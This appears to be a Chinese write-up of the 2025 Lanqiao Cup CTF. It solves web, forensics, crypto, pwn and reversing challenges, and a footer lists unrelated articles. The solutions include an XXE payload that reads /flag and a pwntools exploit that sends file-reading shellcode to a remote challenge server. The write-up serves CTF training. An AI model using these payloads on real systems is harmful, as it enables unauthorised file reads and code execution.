2025蓝桥杯WP

news2025/7/14 8:48:30

引言

在2025年蓝桥杯网络安全赛道中,我们面对涵盖Web安全、逆向工程、PWN、取证分析以及加密解密等多领域的挑战,要求选手具备扎实且全面的安全技术与实战能力。本文将以实战记录的形式,逐题详细还原解题思路与操作步骤,并配以相应的脚本与EXP,便于后续复现与总结。通过此次挑战,不仅加深了我们对多种安全技术的理解,也锻炼了快速定位漏洞与高效利用漏洞的实战水平。

黑客密室逃脱

操作内容

跟着目录访问可以发现加密字符串
在这里插入图片描述
Bp爆破name参数发现了templates文件,发现里面有app.py文件
image-20250524101131231image-20250524101202664

读取app.py文件,发现加密文件
image-20250524101215648

app.py文件里面有hidden.txt里面有密钥

image-20250524101234270

逆向加密代码获得flag

exp
# 原始加密后的十六进制字符串
encrypted_sensitive_info = "d9d1c4d9e0abc19bcbab94986d62a8ca97d492a88fce9aa694687097a09e97d499a4969b9adb99979db2"

# 转换成字节数组
encrypted = bytearray(int(encrypted_sensitive_info[i:i + 2], 16) for i in range(0, len(encrypted_sensitive_info), 2))

# 打印十六进制数组形式
print("[*] Encrypted Hex:", list(encrypted))

# 加密使用的 key
encryption_key = "secret_key3495"

# 解密并输出明文
print("[*] Decrypted:")
for i in range(len(encrypted)):
    key_char = encryption_key[i % len(encryption_key)]
    decrypted_byte = encrypted[i] - ord(key_char)

    # 防止溢出负值,可视情况使用 & 0xFF 或抛弃错误字符
    decrypted_char = chr(decrypted_byte & 0xFF)
    print(decrypted_char, end="")

print()
总结

本题通过目录结构的探索发现了隐藏的加密字符串,进一步利用参数爆破找到了隐藏的文件路径和加密脚本。通过对app.py中的加密逻辑逆向分析,结合hidden.txt中获取的密钥,成功完成了对加密字符串的解密。整个过程中,重点考察了对Web目录结构的敏感度、参数爆破技巧以及Python逆向分析能力。

flowzip

操作内容

wireshark打开,直接搜flag

image-20250524101344344
发现flag明文
image-20250524101354523

总结

本题通过Wireshark抓包工具直接搜索关键字“flag”,快速定位到明文内容。整体流程简洁高效,考察了对抓包分析工具的熟练使用和基本字符串搜索能力。类似题目也可用strings等工具快速提取,有助于提升对数据包内容的快速定位和分析能力。

ezEvtx

操作内容

用windows虚拟机打开日志文件

image-20250524101414132

筛选警告日志

image-20250524101428791

发现敏感文件

image-20250524101436593

总结

该题考察了对Windows事件日志的基本操作与筛选技巧。掌握evtx文件的打开和筛选,是进行Windows取证分析的基础技能。利用系统日志中隐藏的异常信息,有助于快速锁定目标和敏感数据。

Enigma

操作内容

用CyberChef打开文件,指定参数直接获得flag

image-20250524101456497

总结

本题考察对CyberChef工具的熟练使用能力。熟悉该工具能够快速尝试多种解码手段,有效提升解题效率,是日常CTF与安全分析中的实用技能。

星际XML解析器

操作内容

利用XML注入就能获得flag

image-20250524101518536

exp
<?xml version="1.0" encoding="ISO-8859-1"?>
 <!DOCTYPE foo [
 <!ELEMENT foo ANY >
 <!ENTITY xxe SYSTEM "file:///flag" >]>
 <foo>&xxe;</foo>
总结

本题利用了经典的XML外部实体注入(XXE)漏洞,通过构造恶意的DTD定义,读取服务器本地的敏感文件(如/flag),从而直接获取flag。此类漏洞常见于对XML解析时未关闭外部实体处理的场景,属于典型的服务端文件读取漏洞。

RuneBreach

操作内容

输入4个N,进入这里

image-20250524101603935

进入这里执行shellcode:

image-20250524101613836

image-20250524101622827

exp
from pwn import *

context(os='linux', arch='amd64', log_level='debug')
# context.terminal = ['tmux', 'splitw', '-h']

def debug():
    gdb.attach(p)

# =================== 连接目标 ===================
choose = 1
if choose == 1:  # 远程
    success("远程")
    p = remote("39.106.18.186", 30899)
    # libc = ELF("./libc.so.6")  # 可选:如需做libc泄露
else:            # 本地
    success("本地")
    p = process("/home/kali/Desktop/haha/ctf/lqb/pwn/chall")
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    # debug()
    pause()

# =================== 功能函数 ===================

def add(size, index):
    p.sendlineafter(b'>', b'1')
    p.sendlineafter(b':', str(index).encode())
    p.sendlineafter(b':', str(size).encode())

def free(index):
    p.sendlineafter(b'>', b'2')
    p.sendlineafter(b':', str(index).encode())

def edit(index, content):
    p.sendlineafter(b'>', b'3')
    p.sendlineafter(b':', str(index).encode())
    p.sendafter(b':', content)

def show(index):
    p.sendlineafter(b'>', b'4')
    p.sendlineafter(b':', str(index).encode())

# =================== 主要逻辑 ===================

# 初始化交互
for _ in range(4):
    p.sendlineafter(b"):", b"N")

# 泄露栈地址
p.recvuntil(b"now ")
stack = eval((p.recv(14)).decode())
print("Leaked stack address:", hex(stack))

# 构造 shellcode
payload  = asm(shellcraft.open('/flag'))
payload += asm(shellcraft.read(3, stack + 0x100, 0x40))
payload += asm(shellcraft.write(1, stack + 0x100, 0x40))

# 发送 shellcode
p.send(payload)

# =================== 保持交互 ===================
p.interactive()

总结

本题通过输入特定指令进入shellcode执行环境,并泄露了栈地址。利用该地址构造shellcode,调用系统调用读取并输出远程服务器的/flag文件。题目考察了shellcode编写和远程执行能力,结合pwntools实现自动化攻击。

ShadowPhases

操作内容

Ida在这里打断点取flag:

image-20250524101719345

image-20250524101746636

BashBreaker

操作内容

ida修改rip强行调用full_decrypt

image-20250524101812512

运行拿到key:

rc4_init函数有多一个异或:

image-20250524101828953

rc4_next后多了一个置换:

exp
def rc4(key, ciphertext):
    # 初始化 S 盒
    sbox = list(range(256))
    j = 0
    for i in range(256):
        j = (j + sbox[i] + (key[i % len(key)] ^ 0x37)) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]

    # 生成密钥流
    i = j = 0
    keystream = []
    for _ in ciphertext:
        i = (i + 1) % 256
        j = (j + sbox[i]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
        k = sbox[(sbox[i] + sbox[j]) % 256]
        k = ((k >> 4) | (k << 4)) & 0xFF  # 左右半字节互换后保留低 8 位
        keystream.append(k)

    print("keystream:", keystream)

    # 解密
    plaintext = bytearray()
    for i in range(len(ciphertext)):
        plaintext.append(ciphertext[i] ^ keystream[i])

    # 尝试解码成字符串(latin-1 避免乱码)
    try:
        decoded = plaintext.decode("latin-1")
    except UnicodeDecodeError:
        decoded = plaintext.hex()

    print("Decrypted text:", decoded)
    return decoded


key = bytes.fromhex("EC3700DFCD4F364EC54B19C5E7E26DEF6A25087C4FCDF4F8507A40A9019E3B48BD70129D0141A5B8F089F280F4BE6CCD")

res = bytes([
    0xBB, 0xCA, 0x12, 0x14, 0xD0, 0xF1, 0x99, 0xA7, 0x91, 0x48,
    0xC3, 0x28, 0x73, 0xAD, 0xB7, 0x75, 0x8C, 0x89, 0xCD, 0xDD,
    0x2D, 0x50, 0x5D, 0x7F, 0x95, 0xB1, 0xA4, 0x9D, 0x09, 0x43,
    0xE1, 0xD2, 0xE9, 0x66, 0xEA, 0x18, 0x98, 0xC6, 0xCC, 0x02,
    0x39, 0x18
])

rc4(key, res)
总结

本题通过IDA修改指令,强制调用解密函数获得密钥。分析发现该算法为变形RC4,初始状态和密钥流生成时都加入了额外异或和置换操作。通过复现这一逻辑实现解密,成功还原明文。此题考察了逆向分析能力和对经典加密算法变体的理解。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2387279.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

数字人教师:开启教育智慧革新之旅

在科技浪潮的推动下&#xff0c;教育领域正经历一场由数字人教师引领的深刻变革&#xff0c;这不仅是技术与教育融合的创新实践&#xff0c;更是教育模式重塑的关键路径。 一、数字人教师的崛起&#xff1a;教育变革的必然选择 随着互联网、大数据、人工智能等前沿技术的飞速…

详解srs流媒体服务器的集群

前言&#xff1a; 什么是集群 集群就是多台计算机或服务器等资源&#xff0c;联在一起像一台大机器一样工作。比如一群蚂蚁一起搬东西&#xff0c;这些蚂蚁就类似集群里的各个部分。 为什么要集群 性能更强&#xff1a;能把任务分到多个机器上做&#xff0c;一起处理更快&…

ubuntu22.04 安装 SecureCRT8.7.3

用到的全部软件&#xff0c;都放在这个网盘里面了&#xff0c;自取。 链接: https://pan.baidu.com/s/1AR6Lj8FS7bokMR5IrLmsIw?pwd3dzv 提取码: 3dzv 如果链接失效了&#xff0c;关注公号&#xff1a;每日早参&#xff0c;回复&#xff1a;资源&#xff0c;即可免费获取&…

libvirt设置虚拟机mtu实现原理

背景 云计算场景下,可以动态调整虚拟机mtu,提高虚拟机网络性能。设置虚拟机(VM)virtio网卡的MTU(Maximum Transmission Unit)涉及 ​​宿主机(Host)、QEMU/KVM、vhost-net后端​​ 和 ​​虚拟机内部的virtio驱动​​之间的协作。 原理分析 1.libvirt设置mtu分析 libv…

AstroNex空间任务智能控制研究与训练数据集

数据集概述 AstroNex空间任务智能控制研究与训练数据集是朗迪锋科技基于Multiverse平台精心打造的首个全面覆盖航天器智能控制全周期的综合数据集产品。该数据集汇集了轨道动力学、姿态控制、机器视觉、环境感知等多维度数据&#xff0c;为航天器智能算法研发提供丰富的训练与…

汽车副水箱液位传感器介绍

汽车副水箱液位传感器是现代车辆冷却系统中不可或缺的关键部件,其核心功能在于实时监测冷却液存量,确保发动机在最佳温度范围内稳定运行。随着汽车电子化程度不断提升,这一看似简单的传感器已发展成为集机械、电子、材料技术于一体的精密装置,其工作原理与技术演进值得深入…

IEEE出版|2025年智能制造、机器人与自动化国际学术会议 (IMRA2025)

【重要信息】 会议官网&#xff1a;www.icimra.com 会议时间: 2025年11月14日-16日 会议地点: 中国湛江 截稿日期&#xff1a;2025年09月16日(一轮截稿) 接收或拒收通知&#xff1a;文章投递后5-7个工作日 会议提交检索&#xff1a;EI Compendex, Scopus IEEE出版|2025年…

EasyRTC嵌入式SDK音视频实时通话助力WebRTC技术与智能硬件协同发展

一、概述 在万物互联的数字化浪潮下&#xff0c;智能硬件已广泛渗透生活与工业领域&#xff0c;实时音视频通信成为智能硬件实现高效交互的核心需求。WebRTC作为开源实时通信技术&#xff0c;为浏览器与移动应用提供免插件的音视频通信能力&#xff0c;而EasyRTC通过深度优化音…

Higress MCP Server 安全再升级:API 认证为 AI 连接保驾护航

Higress MCP Server 安全再升级&#xff1a;API 认证为 AI 连接保驾护航 Higress 作为一款强大的 AI 原生 API 网关&#xff0c;致力于铺设 AI 与现实世界之间最短、最安全、最具成本效益的连接路径。其核心能力之一便是支持将现有的 OpenAPI 规范无缝转换为 MCP Server&#…

多模态理解大模型高性能优化丨前沿多模态模型开发与应用实战第七期

一、引言 在前序课程中&#xff0c;我们系统剖析了多模态理解大模型&#xff08;Qwen2.5-VL、DeepSeek-VL2&#xff09;的架构设计。鉴于此类模型训练需消耗千卡级算力与TB级数据&#xff0c;实际应用中绝大多数的用户场景均围绕推理部署展开&#xff0c;模型推理的效率影响着…

人脸识别技术合规备案最新政策详解

《人脸识别技术应用安全管理办法》将于2025年6月1日正式实施&#xff0c;该办法从技术应用、个人信息保护、技术替代、监管体系四方面构建了人脸识别技术的治理框架&#xff0c;旨在平衡技术发展与安全风险。 一、明确技术应用的边界 公共场所使用限制&#xff1a;仅在“维护公…

AStar低代码平台-脚本调用C#方法

修改报工表表单&#xff0c;右键定义弹出菜单&#xff0c;新增一个菜单项&#xff0c;并在点击事件脚本中编写调用脚本。 编译脚本&#xff0c;然后在模块代码里面定义这个方法&#xff1a; public async Task<int> on_call_import(DataRow curRow) {PrintDataRow(cur…

企业级RAG技术实战指南:从理论到落地的全景解析

前言 在大模型技术日新月异的今天&#xff0c;检索增强生成&#xff08;RAG&#xff09;技术正成为企业突破AI应用瓶颈的关键利器。当传统AI系统还在处理结构化数据的泥潭中挣扎时&#xff0c;RAG技术已经打开了通向非结构化知识海洋的大门。这本《RAG技术实战指南》以独特的工…

【八股战神篇】RabbitMQ高频面试题

简述RabbitMQ五种模式 &#xff1f; 延伸 请介绍一下RabbitMQ的特点 延伸 简述RabbitMQ的发布与订阅模式 延伸 RabbitMQ 如何保证消息不丢失&#xff1f; 延伸 RabbitMQ 如何保证消息有序&#xff1f; 延伸 专栏简介 八股战神篇专栏是基于各平台共上千篇面经&#xf…

高阶数据结构——红黑树实现

目录 1.红黑树的概念 1.1 红黑树的规则&#xff1a; 1.2 红黑树的效率 2.红黑树的实现 2.1 红黑树的结构 2.2 红黑树的插入 2.2.1 不旋转只变色&#xff08;无论c是p的左还是右&#xff0c;p是g的左还是右&#xff0c;都是一样的变色处理方式&#xff09; 2.2.2 单旋变色…

安卓学习笔记-声明式UI

声明式UI Jetpack Compose 是 Google 推出的用于构建 Android UI 的现代化工具包。它采用 声明式编程模型&#xff08;Declarative UI&#xff09;&#xff0c;用 Kotlin 编写&#xff0c;用于替代传统的 XML View 的方式。一句话概括&#xff1a;Jetpack Compose 用 Kotlin…

AI天气预报进入“大模型时代“:如何用Transformer重构地球大气模拟?

引言:从数值预报到AI大模型的范式变革 传统的天气预报依赖于数值天气预报(NWP, Numerical Weather Prediction),通过求解大气动力学方程(如Navier-Stokes方程)进行物理模拟。然而,NWP计算成本极高,依赖超级计算机,且难以处理小尺度天气现象(如短时强降水)。 近年来…

数据结构第3章 线性表 (竟成)

目录 第 3 章 线性表 3.1 线性表的基本概念 3.1.1 线性表的定义 3.1.2 线性表的基本操作 3.1.3 线性表的分类 3.1.4 习题精编 3.2 线性表的顺序存储 3.2.1 顺序表的定义 3.2.2 顺序表基本操作的实现 1.顺序表初始化 2.顺序表求表长 3.顺序表按位查找 4.顺序表按值查找 5.顺序表…

JAVA面试复习知识点

面试中遇到的题目&#xff0c;记录复习&#xff08;持续更新&#xff09; Java基础 1.String的最大长度 https://www.cnblogs.com/wupeixuan/p/12187756.html 2.集合 Collection接口的实现&#xff1a; List接口&#xff1a;ArraryList、LinkedList、Vector Set接口&#xff1a…

项目中的流程管理之Power相关流程管理

一、低功耗设计架构规划&#xff08;Power Plan&#xff09;   低功耗设计的起点是架构级的电源策略规划&#xff0c;主要包括&#xff1a;   电源域划分   基于功能模块的活跃度划分多电压域&#xff08;Multi-VDD&#xff09;&#xff0c;非关键模块采用低电压&#xf…